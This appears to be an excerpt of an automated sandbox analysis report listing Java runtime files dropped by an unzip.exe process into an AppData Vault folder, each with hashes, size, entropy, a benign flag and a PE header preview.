SSDEEP:	3072:IPyafmXKmGb5SZWKsCY73ekmweZ9WDJWF3Asi/OR+Bq:IxfmXKNxnek+9WDJ4Asi2R+I
MD5:	03356506B562B4F15283C8148D760DE1
SHA1:	E49BD401B6986B6D38D0FB8D71A71C6DD07DF03F
SHA-256:	22EDBD1FC42D1F40691CCF9CA3B79B298BCF0E6DD5501D3B5E75285540ABC549
SHA-512:	1B694E3D6710F8CD441495961356E0454FAA0A38E5E4C13D1A7C7BD886093611796D74342690AA5EA19A41473D229CF6C5ECBD05FDFE2F212140C4996156C980
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y.....}....................}.......}.......}.......}.......................................Rich....................PE..L....^.f...........!...$............N.....................................................@..........................^..h...H_...........................(......D,...Z..T...........................@Y..@...............4............................text...r........................... ..`.rdata...f.......h..................@..@.data...L....p.......V..............@....rsrc................Z..............@..@.reloc..D,...........^..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jfr.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29824
Entropy (8bit):	6.711999283057904
Encrypted:	false
SSDEEP:	384:7XlLSBeFsV61XeEiJJVjsUSQTkW8AeCQxyCnoWZW/GIYi1oFKAM+o/8E9VF0NyBJ:hOBeFsYdeZJTkPAev7noWkYiBAMxkE9
MD5:	057719A3FAA074EFC654955D60B5E623
SHA1:	C193505F3244E567DFC1B8CDED0F8B5BC64D4A8D
SHA-256:	D037C120B4D0D5DDD9B7F431CF03BBACC7558259D99EBD97CD730D98082F361A
SHA-512:	9DDD8A5BF6042313010E256E4CD23E1C08ED990B5ACA48D8E23D6F7BB771D620EF863436AFAE0518C9AB50A5B68F2CE652D7276C0231D9250EFB5716D058B9A6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..Re.c.e.c.e.c.l...c.c...b.g.c...b.f.c.e.b.@.c...f.n.c...g.o.c...`.d.c.\|.g.d.c.\|.c.d.c.\|..d.c.\|.a.d.c.Riche.c.........................PE..L...~^.f...........!...$."...(.......'.......@............................................@......................... O......0V..x....p...............L...(......0....J..T............................J..@............@...............................text.... .......".................. ..`.rdata.. ....@.......&..............@..@.data........`.......B..............@....rsrc........p.......D..............@..@.reloc..0............H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jfxmedia.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	118400
Entropy (8bit):	6.650706295539978
Encrypted:	false
SSDEEP:	3072:L5d4P3EN95JZ5KyWGWYGvbAy7G47PDQFQC1:fRJZ5K3bAy7G0PMp
MD5:	2D92AB5C0960B8671784F07245A42F44
SHA1:	E5BAC60494E440272E0864652339CBBEDF4354A3
SHA-256:	C79BB9911EB7AA93F67FE3876C8748BC77410F5135D03C2E85F54C7E05F9DECE
SHA-512:	96152460E6ECC45ABF44847FE8AF7BA411BE9496734856CE36FC9B698A9C4CD2327697774E84FB63D05F31CDBEE91D53964D7CD8CB9BB0A01EE55856BE9EBAE4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$.YE..YE..YE..P=*.QE...;..SE...;..ZE...;..NE...;..]E...=..[E..@:..\E..YE...E..@:..qE..@:..XE..@:..XE..@:F.XE..@:..XE..RichYE..........PE..L...\?.f...........!...$.(...~......Z&.......@......................................}.....@.................................@............................(.......... i..............................`h..@............@...............................text....'.......(.................. ..`.rdata...[...@...\...,..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jfxwebkit.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70979200
Entropy (8bit):	6.724835362274307
Encrypted:	false
SSDEEP:	393216:WALH1cxeDmNyEovxTXYAIcrouiqBeb1K9dFMnTMJ0j2xpxySpHZckV267zpStHzG:JVHmNyEmXYAIcEKWrKn5gtHGBxOWAm
MD5:	64F5480933CB83AAC114494CE8C122EC
SHA1:	F75B4EE1EACAF7F9FB5179762D94C02C2CCED749
SHA-256:	E5B4F7C0F85EDC226F7DAB5B71F1964207835F7CF6B9CCB8A72704302FE10D52
SHA-512:	D32AE48586B4E6FF8D10FB4B6F5EDB55FFF6CB7935B6A1DFE9F4DE0D41167BC6C727FF9D87C7EA24D662B192CA0B748B6D28E562955182435786A7729133F37E
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........+L8.J"k.J"k.J"k.2.k.J"k04.k.J"k04&j.J"k04!j.J"k04'j.J"k04#j.J"k.5&j.J"k.2#j.J"k.J#k.K"k.J"k.J"k.5'jaO"k.5"j.J"k.5.k.J"k.5 j.J"kRich.J"k........................PE..L....T.f...........!...$.N....;.....u........`................................<......;...@..................................(.h.....+.@.............:..(....+..... l..T....................x......`k..@............`...............................text...L.......N.................. ..`.rdata..zo)..`...p)..R..............@..@.data.........(.......(.............@....rsrc...@.....+......L.............@..@.reloc........+......R*.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jjs.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.822285912295881
Encrypted:	false
SSDEEP:	384:EcF+beUJ4rLJaBjuyhH828yefjOTIYi1otAM+o/8E9VF0NyA+8:EcF+beUj8j/fj3YikAMxkEJ8
MD5:	4D6C901FBB7EA07A950D4990D33E641E
SHA1:	E62D55226F13FA34A3B8601BC343FA2C004321C3
SHA-256:	DC2891E0B72800139716D8334D3F6499C96327BD8B859A18B1234DA90851BFC5
SHA-512:	83E3710B58701B6F06719E7A32E5E9F478762FEF1B7477E41D34C24FB836B08A1FA2686F66522C2F949CCB7B825725EA06399867FCB36FB033074D269672D07D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`......m.....@..................................&.......@..H............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jli.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	237184
Entropy (8bit):	6.837141022577719
Encrypted:	false
SSDEEP:	3072:F9S727FCw4sCQydTbxRptiJJXerKJZ8K5FnrrUIWbRYQCG5NEH43C1w+9baWDaK8:7kwUByFrrUIPQC9HCSw+9blNW
MD5:	173B50D419AD3EBF336223A732664076
SHA1:	42807F67F63E75E02018434D0650356328161E6F
SHA-256:	D38C097E5D7135BCD4299D71540DE5495D0CC9942E2C6C7348B8966F064C997E
SHA-512:	5A9AFC3A823BE5E85D4A358C25F402F215D0EF10B0F550B84CC8530F0B402B8857C4D08756D479F245203DB7AB63E65157A9D4B1F69865BB4D675437ECAD0D84
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........?.\.QR\.QR\.QR..RSS.QR..TS.QR..USH.QR..R[.QR..TSC.QR..USL.QR..RSH.QR..PSU.QR\.PR/.QRE.USR.QRE.QS].QRE.R].QRE.SS].QRRich\.QR........................PE..L...}^.f...........!...$.v...............................................................@..........................S..p...PU..d....................v...(...........D..T............................D..@............................................text...`u.......v.................. ..`.rdata...............z..............@..@.data........`.......J..............@....rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jp2iexp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	280704
Entropy (8bit):	6.122473350024226
Encrypted:	false
SSDEEP:	3072:ZT7yRmTbB7lHdA4R0zrysXLozNwc+yEK4wc6B9hGsTLfY03MCwVNsJVTg4mi4ZoA:dWU97dYysXLoz7zw4w0oWp+mJ9y6JDQt
MD5:	535F06C919FFDC534444239463619B0A
SHA1:	6A14E6CD041C9BF8F482369694AFEE4E4F0ACDF7
SHA-256:	9564EA47BBA49C04C80CE6A08BE2A5D3C2313DAAC2F427946BEDF382C7B8414D
SHA-512:	98362A2BBF2FC182B052238EE4D9FDEE8A49856DF53EE6A8C820ACE8A598C6D3B8A2CCCD97B14335A3AADEBD235E8A64F04A47F1E7463F065B670EA0B81B554D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................h.................................................j.........Rich..........PE..L...._.f...........!...$.....R...............................................P............@....................................h.................... ...(... ......xP..T....................Q.......O..@...............L...8........................text...v........................... ..`.rdata..............................@..@.data... ........(..................@....rsrc...............................@..@.reloc....... ...0..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jp2launcher.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	120960
Entropy (8bit):	6.273758512924114
Encrypted:	false
SSDEEP:	1536:tmESGNTdkNGMnt3fJj8DpvVoW5MzR8ya/wcu2Th+s8nBsx+s8nBsKs8nBsbs8nBz:RSiTdht6TfqTlV32zz5k+fRFqZX
MD5:	678559C8C576A72A6FC232222FC75E13
SHA1:	0834E9976A984CCC58570666CD1E1D23AA6A1C56
SHA-256:	37F0670C8B6CA4A0CEE949CD8512A5B1ED1452C9E227DFE173204B815CE6C5F8
SHA-512:	2735D0BE9D5A206388C2F8942B38B3D7D4A7D5CD35BD791AD66F4D06E95C9CE8214A221FF5C4B70BE3C43390C7C871A77B3AFC0F71E36FDEA6220987953A9409
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.+^..x^..x^..xWz~xH..x.z.yV..x.\|.y[..x.\|.yS..x.\|.y]..x^..x...x.\|.yy..xG}.y_..xG}.yU..xG}.x_..xG}.y_..xRich^..x........PE..L...._.f...............$..........................@.................................>.....@.................................8\|..h........................(..........Pf..T............................e..@................... x.......................text...F........................... ..`.rdata..............................@..@.data...p2..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jp2native.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26240
Entropy (8bit):	6.701299796842755
Encrypted:	false
SSDEEP:	768:egjN7os9RC3z2moP6CA5SqrrYisAMxkEB:es7oawKuCAtrr7qx9
MD5:	23577B2EAB59F9EBC1F61DBD28C61735
SHA1:	89C3BE70778090D32F3A0EC24587E093188471AD
SHA-256:	73AEF320CE151D86317C202EB558B337D1A28F4BDBB6C5FF3BA5CB1DEAB1A7A7
SHA-512:	42992291FAFFC26C106032EEDCDC2014E0A2DDF7A0BFC9BDEEF23A8BF5654BC586235A4779188FC6BD924956867F28DFAEC43909DBBFE9EB3CB406266DEE8F38
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............,...,...,...,...,..-...,..-...,..-...,..-...,...,...,..-...,..-...,..-...,..l,...,..-...,Rich...,................PE..L...~_.f...........!...$.....&...............0.......................................2....@..........................7......t>..d....`...............>...(...p..$...@2..T............................1..@............0......47..@....................text............................... ..`.rdata.......0......................@..@.data...4....P.......2..............@....rsrc........`.......6..............@..@.reloc..$....p.......:..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jp2ssv.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	294016
Entropy (8bit):	6.431847884569643
Encrypted:	false
SSDEEP:	6144:Cu0IYqaiRbzVwC6QIwgcead/8WfcrzVvRq9IWBm:CuLPPRPt6QIwg445WBm
MD5:	D4FAB4D2A28A0441B374293EF4C338A7
SHA1:	5F8BCCCF410670F29AB3BF858C865F3169240278
SHA-256:	B631606857DB39A093016AB7A585B9EB16775F2FF00FF1E9C977D4C73007C32A
SHA-512:	4246C48CBB496A34F4620FD760D7C17859949D8E50DD66575DC959FDADCFDE1E89CBEE6F3B587BD67D31B1472D0B588318776983E4258D613B658BF41AE99C7D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............u...u...u..v...u..p.<.u. .....u. .q...u. .v...u..t...u..q...u...t.8.u. .p...u...p...u...u...u.......u...w...u.Rich..u.........PE..L...._.f...........!...$............................................................1`....@.........................p ......."..d....P...............T...(...`......`...T...............................@...............\............................text...,........................... ..`.rdata..HO.......P..................@..@.data...p....0......................@....rsrc........P.......(..............@..@.reloc.......`... ...4..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jpeg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	172672
Entropy (8bit):	6.605714048091576
Encrypted:	false
SSDEEP:	3072:eB/HxBQ2gx6IKaaG8sY+tsN7RaCGwS/bumCAq+yv1aoYR:eB/HxBQ2K6IfaG83ve/b3Hyv12
MD5:	48575162E8F85D9F1F6D1FB4D02751A4
SHA1:	5C9B93729D4BF36C9C8BDC5739A336A2B85B652A
SHA-256:	5A8CF4FDFCE08C974B6A2A9B292B57C2CEEED7BFB70226BC4AE23328F25A4A8C
SHA-512:	4F45A42084B826F86E3672FE7515B701876481CC992C0635A93E9F94D2611B11DBE6C6D84D009E276145E0FACD6B35DF95A8B3FC15DD045FCBD61A4EEAE15839
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o...........................................................................................................Rich....................PE..L....^.f...........!...$.$...V.......+.......@............................................@..........................r..X....z.......................z...(..........0n..T...........................pm..@............@...............................text....".......$.................. ..`.rdata..d?...@...@...(..............@..@.data...4............h..............@....rsrc................j..............@..@.reloc...............n..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jsdt.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.806332934502899
Encrypted:	false
SSDEEP:	384:2iaYqJkYZqobWRYCzT7J3pj34fIDnydj2TIYi1oR2YAM+o/8E9VF0NyAXsXt:wYq6YZqoqRB7bzydj2cYiwAMxkEosXt
MD5:	64F0645F5E6802F3E117ABF69F4FB0D2
SHA1:	D8AB21BFCE1D83821B01E0C1E0C91A95D2EBBA22
SHA-256:	68D7BA04D98BD13CB8B17FA4DE51486E3EBFD8B561FCDBDD7849B24890BC4386
SHA-512:	6B2D2E061BABB603F4274BA3776BBA6644C36481D106E5820D94B3E1E16B5B7F952299C13FA278B1C574DCF5FC83CEA26A80189A71272DD2B1E3BECC50449AD3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t...............mU.....Ck......m..............Ck......Ck......Ck.......j.......j.......j9......j......Rich....................PE..L....^.f...........!...$.....................0...............................p......l.....@..........................8..<....9..d....P...............0...(...`......84..T...........................x3..@............0...............................text...k........................... ..`.rdata.......0......................@..@.data........@.......(..............@....rsrc........P.......*..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jsound.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	37504
Entropy (8bit):	6.789726023259935
Encrypted:	false
SSDEEP:	768:0o9n0iikntdDqg79SJ7z4qcvx16Olupaldl4CJ6YiYAMxkE1tV:99n0iiktx3pSJAtu+l4CY7GxN
MD5:	7754BAC2CD69DB393A65AA2B2E3DA16B
SHA1:	0E263926A20C5CB2508A5495EED8CF9FBE9A898E
SHA-256:	CF7EFE9DFE9132EF5DD44466EB8926D86B8FA7A63CFB4501226F90CFA1016611
SHA-512:	1539A46291EDC68E6FDC53B4D6D72ED18852D54CA6D05AEE306B5476499C5C2580533E6749E8FC544030CDB75FC1D07A9A8007E589BA208D5F9203DB89C2B2B5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .f. .f. .f.)....f...g.".f...c.,.f...b..f...e.#.f.k.g.%.f. .g.p.f.9.c.!.f.9.b.,.f.9.f.!.f.9..!.f.9.d.!.f.Rich .f.........PE..L....^.f...........!...$.>...,.......E.......P......................................W_....@.........................p[......@e.......................j...(......4....V..T............................U..@............P..@............................text...y<.......>.................. ..`.rdata..f....P.......B..............@..@.data...d....p.......`..............@....rsrc................b..............@..@.reloc..4............f..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jsoundds.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32896
Entropy (8bit):	6.848597471795943
Encrypted:	false
SSDEEP:	768:qZ//zZjpRnPzwmfgyVtLnwcfgW+fTuVkNm/+BEsXJMsEoAKsYilKXAMxkEm:qZ//zZtRnPzwmfgyVtLnwcfgDTCkNRBK
MD5:	CE9BF53FD9B9D0D9044B0733959ED9D3
SHA1:	CE5645C747A6A031B973886E157B9A2D29CE7544
SHA-256:	930B3431253FDCFDB71E697B4FB03D2AF8561078BF73D4D684E7AFF525E48F63
SHA-512:	E651AD51748EA35EF5F9AA45598A65027958EC9CBF826D467C27B74BA79C70A7E6B9C5FB5F24992D9FD0C9B24C3CEE2E1E02348E3B5C24781AF74BD101B4BAEB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a){j%H.9%H.9%H.9,0.9#H.9.6.8'H.9.6.8)H.9.6.8/H.9.6.8$H.9n0.8.H.9%H.9.H.9<7.8$H.9<7.8&H.9<7.8$H.9<7.9$H.9<7.8$H.9Rich%H.9................PE..L....^.f...........!...$.6...(......j>.......P......................................).....@.........................@X.......].......................X...(......x...@S..T............................R..@............P...............................text...u5.......6.................. ..`.rdata.......P.......:..............@..@.data...t....p.......N..............@....rsrc................P..............@..@.reloc..x............T..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\keytool.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.8224011378313625
Encrypted:	false
SSDEEP:	384:nMNWbe0J4rLJapjVy9Y820SefBOvIYi1oMAM+o/8E9VF0NyFi3:nMNWbe0z8LffBHYiDAMxkEe3
MD5:	AC78676346461A9163A43AD535570924
SHA1:	CB141A7207E72D5582DC064EE665BF99519F7777
SHA-256:	01BA51F678F6925D9A86F03A4CDB84614EC2E0A8C70335617FA62090A25E2846
SHA-512:	F9B41F0FAFF97C5E086FFD9F366A1FEB0A42D8FEEE242E520B146613525931D64324B33D6FC6C5875C8D78DD45ABD31ECD171693B81CB83E5EC743CD31F26A36
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`......`.....@..................................&.......@..\............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\kinit.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.820132626377083
Encrypted:	false
SSDEEP:	384:78NWbeEJ4rLJaEujfysA82apyefjOuIYi1oO+MAM+o/8E9VF0NyYG3:78NWbeES58P/fjoYibAMxkEZ3
MD5:	C243BD0A8730FADCA93CFEBECEC2E897
SHA1:	4512DFE6E717721AD7B393C676BB3CFA8C334528
SHA-256:	1A2E04BA9A66ABF925C0D9196BCF262576747F58DDBEB098643E21F2944FC173
SHA-512:	2329D7A3A636107E77DA116AF1F1C5F5BA0DB46190E9275607011E101362F6F1553F9F01A38A56E41C4A94F86F88E4C647D75EDDB4B81D545031983200688404
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`.......@....@..................................&.......@..T............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\klist.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.822879482235744
Encrypted:	false
SSDEEP:	384:78NWbeEJ4rLJaEujZy2A82AEefjORIYi1opWAM+o/8E9VF0NyfAM:78NWbeES98fhfjZYihAMxkECM
MD5:	0443D96603E0A7D18F95F26E9E2069A2
SHA1:	7FF0CF6DFB8BC41190869361A9FE6964147157D2
SHA-256:	59ABF5B545453C1A202F505CC29A617BDC49ADAE3D746D33D55CD4570F88666E
SHA-512:	A20E68EBB13C42A8BACDF0B830481AB5F3B02FBB7DF19C270E0D2333B66AB728F2C8ED3438D1BDFDB01702C8102C1668CF7B50870ADFB2D5A1AA50268626DB41
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`.......%....@..................................&.......@..T............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\ktab.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.821613583971568
Encrypted:	false
SSDEEP:	384:/8NWbeEJ4rLJaEuj+yYA822EeflOkIYi1o7hEAM+o/8E9VF0NyzvN:/8NWbeESg81hflWYiQhEAMxkEP
MD5:	7ED3AA8BAD5C701F44C74C42AAFCE9A0
SHA1:	CADBE69E8E75BF5500E9E3F1F42C99DFDA4CC861
SHA-256:	EA0AC51DD302384E70890FF84090B44E2F76FA6016E1C33959455231535705E4
SHA-512:	08B464675EA07B50974DE38E3B3A870146AA2ADD6CCE9FA446B5F71E10BD51BFEAB62E98A1F0227C4B93549FB63FB923CAC89AC10854D49F11E92EE7A6DB8AA4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`............@..................................&.......@..T............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\lcms.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	227968
Entropy (8bit):	6.502242895816657
Encrypted:	false
SSDEEP:	6144:grFYEUDl1HTRegdbyGro95dNOZUKUNAye/tXiPOGb:gcroOCKUH0iGq
MD5:	E4BF20B418348A61D67F7FFE5C20BFB6
SHA1:	FFCEF440CA52DE47961F4F341554E1A3695CA20B
SHA-256:	C678ADAB0CC76B35252EC966AC92824D6447B61B4B6EDC676ABF5AE5B3B7F09F
SHA-512:	2E3F7ADDB8BA1A04631051DF7B785B0D63869E76BBBF1717587620228543266B5444785529D5104DACFFB64D646E0385BBC315579F6B6277E599C648EB872AE5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#..p..p..p...p..p...q..p...q..p...q..p...q..p...q..p...q..p..p..p...q..p...q..p..Bp..p...q..pRich..p................PE..L....^.f...........!...$............\................................................&....@.............................h...h........p...............R...(..............T...............................@............................................text...&........................... ..`.rdata...c.......d..................@..@.data....5...0...*..................@....rsrc........p.......:..............@..@.reloc...............>..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\management.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	41088
Entropy (8bit):	6.6636967529255084
Encrypted:	false
SSDEEP:	768:8Y77Cv9pVdR8h6GMn0taRAFpI6Yi1cAMxkEhFq:PCTVdsMncaRep57Yxvq
MD5:	AEA9277DD50474A09505210C83573692
SHA1:	E3BCB6998282E9DC1FDB90AD7566AB717C749040
SHA-256:	C636ED04D698AE6C0516F8A92575BE084C7178B06DFC0C94CF903280DE940DA7
SHA-512:	48440D6B7D09D35A3E0CF4F13598A5C66CA805AF17A1206095E020C5D15E58ECBAB6D90EC1FCB77CA5755B9A85F4C4A53955F210A205E7CBEECF9C74E95633F1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M8X.#kX.#kX.#kQ..kT.#k.."jZ.#k...kZ.#k..&jT.#k..'jR.#k.. jZ.#k.."j\.#kA."j].#kX."k..#kA.'jH.#kA.#jY.#kA..kY.#kA.!jY.#kRichX.#k................PE..L....^.f...........!...$.4...D.......8.......P............................................@.........................._.......y.......................x...(...........[..T...........................HZ..@............P..D............................text....2.......4.................. ..`.rdata..H2...P...4...8..............@..@.data...t............l..............@....rsrc................n..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\mlib_image.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	582784
Entropy (8bit):	6.431292994373914
Encrypted:	false
SSDEEP:	12288:wNm8cmdAKnubb/ci57epARRFwGWu1y4gRzOrBUoNW1kxy:4amdA8ubb/ci57euRFwGWSy4gOBUoNWV
MD5:	840DFBA05D549625B4436ACD36533A57
SHA1:	5B65B42D77761042A48B3D4A56007E7DA1EC4636
SHA-256:	03EEFBDC2A938ECB2D990E224ADD0ED05D41BD50D3476F2CCED2D95EEE5C9988
SHA-512:	4ECF5DC2A5B37E0A967A511178C6E05EEA22EA2D5B6C661FAC9B93D17858369DDA9DB61DCFDB622DE65E549FC7B5F7EE4433A5103061CEF7C44191BD6ECFA939
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6KO.r!.r!.r!.{R..t!..T .p!.9R .q!.r* .T!..T$.~!..T%.x!..T".v!.kU%.E!.kU!.s!.kU..s!.kU#.s!.Richr*!.........PE..L....^.f...........!...$............?...............................................9?....@.............................$......d........................(......\|...P...T...............................@...............x............................text...-........................... ..`.rdata..L...........................@..@.data...l...........................@....rsrc...............................@..@.reloc..\|...........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	448408
Entropy (8bit):	6.693790505404224
Encrypted:	false
